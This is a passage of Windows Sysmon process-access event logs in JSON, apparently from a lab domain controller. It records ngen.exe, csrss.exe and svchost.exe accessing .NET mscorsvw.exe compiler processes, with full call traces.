Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7004,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.007\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-0010A4880B00}\r\nTargetProcessId: 5056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.007","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-0010A4880B00}","TargetProcessId":"5056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7005,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.007\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-0010A4880B00}\r\nTargetProcessId: 5056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.007","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-0010A4880B00}","TargetProcessId":"5056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7006,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.226\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-0010D58C0B00}\r\nTargetProcessId: 3880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.226","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-0010D58C0B00}","TargetProcessId":"3880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7007,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.226\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-0010D58C0B00}\r\nTargetProcessId: 3880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.226","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-0010D58C0B00}","TargetProcessId":"3880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7008,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.226\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-0010D58C0B00}\r\nTargetProcessId: 3880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.226","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-0010D58C0B00}","TargetProcessId":"3880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7009,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.367\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-0010ED8F0B00}\r\nTargetProcessId: 820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.367","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-0010ED8F0B00}","TargetProcessId":"820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7010,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.367\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-0010ED8F0B00}\r\nTargetProcessId: 820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.367","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-0010ED8F0B00}","TargetProcessId":"820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7011,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.367\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-0010ED8F0B00}\r\nTargetProcessId: 820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.367","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-0010ED8F0B00}","TargetProcessId":"820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM